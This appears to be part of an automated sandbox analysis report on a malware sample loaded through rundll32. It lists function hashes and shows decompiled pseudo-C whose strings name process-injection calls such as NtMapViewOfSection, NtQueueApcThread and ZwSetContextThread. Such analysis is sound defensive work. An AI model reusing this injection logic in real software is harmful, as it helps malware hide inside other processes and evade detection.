                                        • Instruction Fuzzy Hash: 9431AD33718B8485DA608B26E84439BB7B4F798BE4F994126EE8D03F59DA3CC156CB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5370a3f4b512b4388e3cc77e2a06d928f694aea8817902be0253ce5e8ae93cb
                                        • Instruction ID: e11ce5d8cab333f13597e2e7074dc52cc62dbf60ea490fe2da5e42254df6d913
                                        • Opcode Fuzzy Hash: f5370a3f4b512b4388e3cc77e2a06d928f694aea8817902be0253ce5e8ae93cb
                                        • Instruction Fuzzy Hash: 38319153A1D1E89DE717CB7D181069DBEE4D2B2248748C28AD7D09BF4BC42DD216C761
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd68b8e435b0a0d2048b1013f2b333b598a12eba0e0e82a8864ecf50a06122ab
                                        • Instruction ID: 6242d88c6db18e6a34d99fd09b3561c992e9e73addc5980dadf67a65b76d2fea
                                        • Opcode Fuzzy Hash: fd68b8e435b0a0d2048b1013f2b333b598a12eba0e0e82a8864ecf50a06122ab
                                        • Instruction Fuzzy Hash: 6E31801361E1F88EE707CB7D08145AD7EA4D27624538AC14AE6D1C7B87C43DCA06D772
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1eb2ca1af2c5362cff345ffa7fd2c67c0b97edeb0dfe15c880a505a5d2046be
                                        • Instruction ID: b63d7623e85e8a2376b88b0cb16eca6337c714a91816e4eac49146a8d6fce148
                                        • Opcode Fuzzy Hash: a1eb2ca1af2c5362cff345ffa7fd2c67c0b97edeb0dfe15c880a505a5d2046be
                                        • Instruction Fuzzy Hash: 4F312A13A1E2F48EE706CB7D48101ADBEA0A366245389818ADAE1C7B87C53DD616D762
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ebfb0e6f134ea65262ee410012ec6491c41d2c0104128f764a2d6c10f8d561ff
                                        • Instruction ID: 5b7fa78dd2d8b53acbf92e19b39e0a701d0207137a065f98b28f6696f8def4ba
                                        • Opcode Fuzzy Hash: ebfb0e6f134ea65262ee410012ec6491c41d2c0104128f764a2d6c10f8d561ff
                                        • Instruction Fuzzy Hash: 1E312A43A2E1F48EA706CB7D48101ACBEA0E276245389C19AE7E0C7A87C53DD616D772
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f85920118269f7386a5e2f6e07031ff80c4b4f06cdc6c529a7213641e7bc5e6
                                        • Instruction ID: 7a6af0c6b4b39c789504e8aaccc1e667fcbca0a4743890f7841af62c7fbe6ac0
                                        • Opcode Fuzzy Hash: 0f85920118269f7386a5e2f6e07031ff80c4b4f06cdc6c529a7213641e7bc5e6
                                        • Instruction Fuzzy Hash: 4A21932332A6D58BE7628E6C584128DAF2093763C4F898147DFC89B783C42CD58BC362
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 753c19a4123615dbcf416cfcdf5be9341aa184747f224f8d9a5ea04bab36c10b
                                        • Instruction ID: 51e33ca5a81260763b413abd3bb42f718ad1088544f1298766ae63dcfa458ef4
                                        • Opcode Fuzzy Hash: 753c19a4123615dbcf416cfcdf5be9341aa184747f224f8d9a5ea04bab36c10b
                                        • Instruction Fuzzy Hash: B221301721A2C88AE7524B7C9D0138D6E60A77A784FC99247CEC9EB747D42CC54AC373
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 952589fd109a1bb43b06426705f72ff44cad5972269654ae5c5cdb558993d222
                                        • Instruction ID: c5a8dd6067d47f321f5ff11a8d5157c257bb9209b0ad1c535c35e092a59b7d47
                                        • Opcode Fuzzy Hash: 952589fd109a1bb43b06426705f72ff44cad5972269654ae5c5cdb558993d222
                                        • Instruction Fuzzy Hash: 8B21932372A2C48BD3518FAC580128DAF20A3763C4F858147CFC9AB797C438D58BC362
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: de51f1ee16da104fd433d56b40092f42bdf677712e5dd9870ae127006d9247c7
                                        • Instruction ID: 3362d8f433bdfbec8cf9f098c5add2e6332906c340619654cfe0ff39be800e9c
                                        • Opcode Fuzzy Hash: de51f1ee16da104fd433d56b40092f42bdf677712e5dd9870ae127006d9247c7
                                        • Instruction Fuzzy Hash: D0110C0722A7D88AD3038B7C590054D6FA4F36A69838E9186DAC4CB747C438D55AC373
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 26eb26508f00a0b5be9c6f34db07c1bcdd29cfda4e6fc5fd9407297f0d453823
                                        • Instruction ID: 278ec60bacf2b8a5e3d5fa1bdd619f66fea3122fd4c81edfa3966dafbb214969
                                        • Opcode Fuzzy Hash: 26eb26508f00a0b5be9c6f34db07c1bcdd29cfda4e6fc5fd9407297f0d453823
                                        • Instruction Fuzzy Hash: 8F111B0322A3D88AD3038B7C590064D6EA8A376A947CDD696DAC5CB347C438D55AC373
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2029b59a4c444fe4c6c58784dc65606972c48091c1b91a45674541ba0b0d21b1
                                        • Instruction ID: d6cf6ef14fc6ca78a017590a539b2506a63d5084b3d0cb78bb81fd897e1f0556
                                        • Opcode Fuzzy Hash: 2029b59a4c444fe4c6c58784dc65606972c48091c1b91a45674541ba0b0d21b1
                                        • Instruction Fuzzy Hash: 5211ED0722A7D88ED3078B7C590054D6EA8E37A6983CEA296DBD4CB757C038D55AC373
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b4b4ca15e1c52f1109d84f796cb2a9d77310f2ab76d6906b281c9c887d29b203
                                        • Instruction ID: 8d907fe76a1bcdf41860c0f0589ec7fd81a1e5727b0663ac3c73adad4ae7d8c4
                                        • Opcode Fuzzy Hash: b4b4ca15e1c52f1109d84f796cb2a9d77310f2ab76d6906b281c9c887d29b203
                                        • Instruction Fuzzy Hash: CB018B73B388A04A03569B7EAC02A47B992A792771750EB60BF75CBFD4C238D9104F40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e86f949cf0bcfe10732f01fa75e4687a9e7db4b82c29d1e8340628133e291e0f
                                        • Instruction ID: 8fd0319c26bb951a0646d32378aa17909c94f61236f0faf6ba8a99da8a011f1d
                                        • Opcode Fuzzy Hash: e86f949cf0bcfe10732f01fa75e4687a9e7db4b82c29d1e8340628133e291e0f
                                        • Instruction Fuzzy Hash: F911823362159486E74CCF76C965FED33A6F3D9304F46C21EEA160369ADA325A16CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9546475e1d6630c97de7f844a6ea02cf953bcca35165af4bdc36e17a5dcdd0d0
                                        • Instruction ID: f9136ed562ec683575da085d4a4a28430d89c26e0cb6e772e0e589982710efe3
                                        • Opcode Fuzzy Hash: 9546475e1d6630c97de7f844a6ea02cf953bcca35165af4bdc36e17a5dcdd0d0
                                        • Instruction Fuzzy Hash: 1011657371150487EB8CDA79CC46ADE3392E3A8708F59C72ADA15C7786D638C547C744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3bfa37e68459a4c776e5d1a501ae4ef2b0d0912e912c633c36e88c1f02373f0e
                                        • Instruction ID: 189efd70401bf8a7c06e9b1b98037c0b973713717965bf3232afefd022cf1223
                                        • Opcode Fuzzy Hash: 3bfa37e68459a4c776e5d1a501ae4ef2b0d0912e912c633c36e88c1f02373f0e
                                        • Instruction Fuzzy Hash: 2A017173B38960465350CB3EFC40A46B642A792770755EB50AF70A7ED4C238C8110F40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5ca5967160483d4de5ff4c38f08cab94913b758e7f7304b8ef425bfdeb80f2c6
                                        • Instruction ID: fe851d170575bb75ed7c036c7e1a75165102bf0021aa66426457902acec69a46
                                        • Opcode Fuzzy Hash: 5ca5967160483d4de5ff4c38f08cab94913b758e7f7304b8ef425bfdeb80f2c6
                                        • Instruction Fuzzy Hash: 64F0BBBBC096C45BEEA68A289C6A29E6FF09373A10F5FC05589454B98BEC194C1AC211
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e606231cd89ed15ed5f9f9afc63c7373d15b47af1cca05b91b87dbd95cfef46
                                        • Instruction ID: 57806fe7f272b1330573a5b0276cc18bee458921f75292d919ff8c4d5b1d224f
                                        • Opcode Fuzzy Hash: 4e606231cd89ed15ed5f9f9afc63c7373d15b47af1cca05b91b87dbd95cfef46
                                        • Instruction Fuzzy Hash: F5A002728085D190E7564D2868591D52A916336D48A099845C94007586C54A1479C612
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Variant$Clear$String$_com_issue_error$FreeInit$Alloc
                                        • String ID: CreateFlags$ProcessId$ProcessStartupInformation$ReturnValue$ShowWindow
                                        • API String ID: 2067041508-2207766347
                                        • Opcode ID: 928b80573e51ff3e9ef2be97ae4f12264b351f62580b05883e0d2c2687bf9381
                                        • Instruction ID: a00988c325bbc709178c8bbc6cc1707bcda6ec3811704cc400fd98b22df06ffb
                                        • Opcode Fuzzy Hash: 928b80573e51ff3e9ef2be97ae4f12264b351f62580b05883e0d2c2687bf9381
                                        • Instruction Fuzzy Hash: B0812536200B4496EF10DF65E89839E77B0FB98B98F524416EE4E47B68DF38C55AC740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 22%
                                        			E0000021E21EF2FE7390(long long* __rax, void* __rcx, void* __rdx, void* __r8, long long __r13, char _a8, char _a24, char _a32) {
                                        				long long _v56;
                                        				char _v64;
                                        				char _v72;
                                        				intOrPtr _v80;
                                        				intOrPtr _v88;
                                        				intOrPtr _v96;
                                        				long long _v104;
                                        				long long _v112;
                                        				long long _v120;
                                        				void* __rbx;
                                        				void* __rdi;
                                        				void* __rsi;
                                        				void* _t35;
                                        				void* _t49;
                                        				void* _t50;
                                        				void* _t51;
                                        				long long* _t60;
                                        				void* _t94;
                                        				void* _t103;
                                        
                                        				_t94 = __rdx;
                                        				if ( *((long long*)(__r8 + 0x18)) - 0x10 < 0) goto 0xf2fe73af;
                                        				goto 0xf2fe73b2;
                                        				_t103 = __r8;
                                        				r15d =  *((intOrPtr*)(__r8 + 0x10));
                                        				GetModuleHandleW(??);
                                        				GetProcAddress(??, ??);
                                        				GetProcAddress(??, ??);
                                        				 *__rax();
                                        				 *__rax();
                                        				if (__rcx == 0) goto 0xf2fe7544;
                                        				_v56 = __r13;
                                        				r13d = 0;
                                        				_a8 = __r13;
                                        				_a32 = __r13;
                                        				_v72 = __r13;
                                        				if (E0000021E21EF301BAE0(r15d, __rax, __rax,  &_a32, __rax, __rdx,  &_a8) != 0) goto 0xf2fe74dc;
                                        				_v64 = __r13;
                                        				_a24 = __r13;
                                        				GetModuleHandleW(??);
                                        				GetProcAddress(??, ??);
                                        				GetProcAddress(??, ??);
                                        				_v80 = 0x40;
                                        				_v88 = r13d;
                                        				_v96 = 2;
                                        				r9d = 0;
                                        				_v104 =  &_v64;
                                        				_t60 =  &_a24;
                                        				_v112 = _t60;
                                        				_v120 = __r13;
                                        				_t35 =  *__rax();
                                        				if ( *__rax() != 0) goto 0xf2fe74dc;
                                        				r8d = r15d;
                                        				E0000021E21EF310DC90(_t35, _t49, _t50, _t51, _a32, _t103, __rax, _t94,  &_v72);
                                        				if (_t94 == 0) goto 0xf2fe751f;
                                        				GetModuleHandleW(??);
                                        				GetProcAddress(??, ??);
                                        				r9d = 0;
                                        				_v120 = r13d;
                                        				r8d = 0;
                                        				 *_t60();
                                        				CloseHandle(??);
                                        				CloseHandle(??);
                                        				CloseHandle(??);
                                        				CloseHandle(??);
                                        				return 1;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Handle$AddressProc$Close$Module
                                        • String ID: @$NtMapViewOfSection$NtQueueApcThread$NtResumeProcess$RtlNtStatusToDosError$ntdll.dll
                                        • API String ID: 2187694145-438560624
                                        • Opcode ID: 0f7f743a0d85d901ffeb3d5fa5ed4d3bc80856ae75f4b12be0242c3d0e15578b
                                        • Instruction ID: cab1a711ee811c17cf31033d9b256403da9e28b97377417e1efcf8d902834702
                                        • Opcode Fuzzy Hash: 0f7f743a0d85d901ffeb3d5fa5ed4d3bc80856ae75f4b12be0242c3d0e15578b
                                        • Instruction Fuzzy Hash: B4413B76204B8186EE609B12FC1879B67B5F7AAB95F464025DE8947B18EF3CC05AC740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 35%
                                        			E0000021E21EF2FEEF50(long long __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, void* __r9) {
                                        				void* __rsi;
                                        				long _t40;
                                        				long _t41;
                                        				long _t42;
                                        				long long _t63;
                                        				long long _t64;
                                        				int _t76;
                                        				long long _t77;
                                        				void* _t79;
                                        				intOrPtr* _t80;
                                        				long long _t82;
                                        				void* _t83;
                                        				void* _t85;
                                        				void* _t86;
                                        				struct _SECURITY_ATTRIBUTES* _t94;
                                        
                                        				_t75 = __rdx;
                                        				_t63 = __rax;
                                        				 *((long long*)(_t85 + 8)) = __rbx;
                                        				 *((long long*)(_t85 + 0x18)) = _t82;
                                        				_t86 = _t85 - 0x40;
                                        				r9d = 0;
                                        				r14d = r8d;
                                        				_t80 = __rdx;
                                        				_t83 = __rcx;
                                        				r8d = 0;
                                        				CreateEventW(_t94, _t76);
                                        				 *((long long*)(__rdx + 8)) = __rax;
                                        				_t77 = __rax;
                                        				if (__rax != 0) goto 0xf2feefb3;
                                        				_t40 = GetLastError();
                                        				 *((intOrPtr*)( *__rdx))();
                                        				 *((intOrPtr*)(_t86 + 0x30)) = _t40;
                                        				E0000021E21EF310D880(__rdx, __rdx);
                                        				 *((long long*)(_t86 + 0x38)) = _t63;
                                        				if (_t40 != 0) goto 0xf2fef0a1;
                                        				r9d = 0;
                                        				r8d = 0;
                                        				CreateEventW(??, ??, ??, ??);
                                        				 *((long long*)(_t83 + 0x10)) = _t63;
                                        				 *((long long*)(__rdx + 0x10)) = _t63;
                                        				if ( *((long long*)(_t83 + 0x10)) != 0) goto 0xf2fef000;
                                        				_t41 = GetLastError();
                                        				 *((intOrPtr*)( *__rdx))();
                                        				 *((intOrPtr*)(_t86 + 0x30)) = _t41;
                                        				E0000021E21EF310D880(__rdx, __rdx);
                                        				 *((long long*)(_t86 + 0x38)) = _t63;
                                        				if (_t41 != 0) goto 0xf2fef0b3;
                                        				_t64 = _t86 + 0x68;
                                        				 *((long long*)(_t86 + 0x28)) = _t64;
                                        				 *((intOrPtr*)(_t86 + 0x20)) = 0;
                                        				 *((intOrPtr*)(_t86 + 0x68)) = 0;
                                        				E0000021E21EF3111DF0(0, r14d, _t64, __rbx, __rdx, __rdx, 0xf2fef0e0, __rdx);
                                        				 *((long long*)(_t83 + 8)) = _t64;
                                        				if (_t64 != 0) goto 0xf2fef074;
                                        				_t42 = GetLastError();
                                        				 *((intOrPtr*)( *_t80))();
                                        				if (_t77 == 0) goto 0xf2fef053;
                                        				CloseHandle(_t79);
                                        				if ( *((intOrPtr*)(_t83 + 0x10)) == 0) goto 0xf2fef062;
                                        				CloseHandle(??);
                                        				 *((intOrPtr*)(_t86 + 0x30)) = _t42;
                                        				E0000021E21EF310D880( *((intOrPtr*)(_t83 + 0x10)), _t75);
                                        				 *((long long*)(_t86 + 0x38)) = _t64;
                                        				if (_t42 != 0) goto 0xf2fef0c5;
                                        				if (_t77 == 0) goto 0xf2fef08e;
                                        				WaitForSingleObject(??, ??);
                                        				return CloseHandle(??);
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$CloseErrorHandleLast$Create$Init_thread_footerObjectSingleSleepWait
                                        • String ID: thread$thread.entry_event$thread.exit_event
                                        • API String ID: 1744329276-3017686385
                                        • Opcode ID: eb338315c14347d22613674612ab0df602264c80eee5ef42f2649d6ee0591794
                                        • Instruction ID: a1c82228bd5f5088b8f08d083b4b264a98ec795ff665e7344a9fe43a7276bd01
                                        • Opcode Fuzzy Hash: eb338315c14347d22613674612ab0df602264c80eee5ef42f2649d6ee0591794
                                        • Instruction Fuzzy Hash: F8517A36214B4182EF159F65E88839A73B0F7A4B90F128625EF5A03FA9EF7CC056C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: ZwAllocateVirtualMemory$ZwGetContextThread$ZwReadVirtualMemory$ZwSetContextThread$ZwWriteVirtualMemory$ntdll.dll
                                        • API String ID: 667068680-1731939869
                                        • Opcode ID: e028038f595151421b2040325bb29b6033f210ddb9d79b46612d08f833186a58
                                        • Instruction ID: 6aa95faec8005985c0d7a98fed67a8ce6205b5f8905746ef9b1805e044cf0cb3
                                        • Opcode Fuzzy Hash: e028038f595151421b2040325bb29b6033f210ddb9d79b46612d08f833186a58
                                        • Instruction Fuzzy Hash: 33110A74205F4081FE15DB15EC983AA23F1BB79B90F8A9025CC0E02F65EF2CD45AC310
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 48%
                                        			E0000021E21EF2FFD730(signed int __edx, short __esi, signed char* __rbx, long long __rcx, long long __rsi, void* __r8, void* __r9) {
                                        				void* __rdi;
                                        				signed int _t90;
                                        				signed int _t91;
                                        				void* _t107;
                                        				void* _t115;
                                        				short _t116;
                                        				void* _t117;
                                        				void* _t134;
                                        				long long _t148;
                                        				void* _t149;
                                        				signed char* _t152;
                                        				long long _t155;
                                        				signed char* _t171;
                                        				signed char* _t172;
                                        				signed long long _t175;
                                        				signed int _t176;
                                        				long long _t177;
                                        				void* _t190;
                                        				signed char* _t191;
                                        				void* _t195;
                                        				void* _t197;
                                        				void* _t200;
                                        				void* _t203;
                                        				void* _t205;
                                        				void* _t206;
                                        				signed char* _t209;
                                        				void* _t211;
                                        				void* _t213;
                                        
                                        				_t211 = __r9;
                                        				_t152 = __rbx;
                                        				_t116 = __esi;
                                        				_t134 = _t205;
                                        				 *((long long*)(_t134 + 8)) = __rcx;
                                        				_t203 = _t134 - 0x48;
                                        				_t206 = _t205 - 0x130;
                                        				 *((long long*)(_t206 + 0x50)) = 0xfffffffe;
                                        				 *((long long*)(_t134 + 0x10)) = __rbx;
                                        				 *((long long*)(_t134 + 0x20)) = __rsi;
                                        				_t196 = __r9;
                                        				_t200 = __r8;
                                        				r14d = __edx & 0x0000ffff;
                                        				if ( *((intOrPtr*)(__r8 + 8)) + 2 - 0xffff <= 0) goto 0xf2ffd81e;
                                        				 *((long long*)(_t206 + 0x30)) = 0xf319d200;
                                        				 *((long long*)(_t206 + 0x38)) = 0xf319d200;
                                        				 *((long long*)(_t206 + 0x40)) = 0xf319d200;
                                        				 *(_t206 + 0x20) = "field name too large";
                                        				 *(_t206 + 0x28) = 1;
                                        				E0000021E21EF310E0E4(__rbx, _t206 + 0x20, _t206 + 0x38, __r9, __r8);
                                        				 *((long long*)(_t206 + 0x30)) = 0xf319d240;
                                        				 *((long long*)(_t206 + 0x30)) = 0xf319d270;
                                        				E0000021E21EF2FFE350(_t152, _t203 - 0x50, _t206 + 0x30);
                                        				 *0x21EF319D298 = "class boost::beast::http::basic_fields<class std::allocator<char> >::value_type &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char> >,class boost::basic_string_view<char,struct std::char_traits<char> >)";
                                        				 *0x21EF319D2A0 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/fields.ipp";
                                        				 *0x21EF319D2A8 = 0x47a;
                                        				E0000021E21EF30012E0(0xf319d270, _t203 - 0x10);
                                        				E0000021E21EF3001320(_t107, _t152, _t206 + 0x58, 0xf319d270, _t200);
                                        				E0000021E21EF31103EC(_t152, _t206 + 0x58, 0xf31e4b98, _t200, _t213);
                                        				if ( *((intOrPtr*)(_t211 + 8)) + 2 - 0xffff <= 0) goto 0xf2ffd8db;
                                        				 *((long long*)(_t206 + 0x30)) = 0xf319d200;
                                        				 *((long long*)(_t206 + 0x38)) = 0xf319d200;
                                        				 *((long long*)(_t206 + 0x40)) = 0xf319d200;
                                        				 *(_t206 + 0x20) = "field value too large";
                                        				 *(_t206 + 0x28) = 1;
                                        				E0000021E21EF310E0E4(_t152, _t206 + 0x20, _t206 + 0x38, _t196, _t200);
                                        				 *((long long*)(_t206 + 0x30)) = 0xf319d240;
                                        				 *((long long*)(_t206 + 0x30)) = 0xf319d270;
                                        				E0000021E21EF2FFE350(_t152, _t203 - 0x10, _t206 + 0x30);
                                        				 *((long long*)(0x21ef319d298)) = "class boost::beast::http::basic_fields<class std::allocator<char> >::value_type &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char> >,class boost::basic_string_view<char,struct std::char_traits<char> >)";
                                        				 *((long long*)(0x21ef319d2a0)) = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/fields.ipp";
                                        				 *((intOrPtr*)(0x21ef319d2a8)) = 0x47e;
                                        				E0000021E21EF30012E0(0xf319d270, _t203 - 0x50);
                                        				E0000021E21EF3001320(_t107, _t152, _t206 + 0x58, 0xf319d270, _t200);
                                        				_t171 = _t206 + 0x58;
                                        				E0000021E21EF31103EC(_t152, _t171, 0xf31e4b98, _t200, _t195);
                                        				asm("inc ecx");
                                        				asm("dec ax");
                                        				asm("psrldq xmm0, 0x8");
                                        				asm("dec ax");
                                        				_t190 = 0xf319d270 + _t171;
                                        				if (_t171 == _t190) goto 0xf2ffd93a;
                                        				_t90 =  *_t171 & 0x000000ff;
                                        				if (_t90 == 0x20) goto 0xf2ffd904;
                                        				if (_t90 != 9) goto 0xf2ffd909;
                                        				_t172 =  &(_t171[1]);
                                        				goto 0xf2ffd8f4;
                                        				if (_t172 == _t190) goto 0xf2ffd93a;
                                        				_t209 = _t190 - 1;
                                        				_t91 =  *_t209 & 0x000000ff;
                                        				if (_t91 == 0x20) goto 0xf2ffd91e;
                                        				if (_t91 != 9) goto 0xf2ffd926;
                                        				_t191 = _t209;
                                        				goto 0xf2ffd90c;
                                        				if (_t172 == _t191) goto 0xf2ffd93a;
                                        				 *(_t206 + 0x20) = _t172;
                                        				 *(_t206 + 0x28) = _t191 - _t172;
                                        				goto 0xf2ffd944;
                                        				 *(_t206 + 0x20) = _t152;
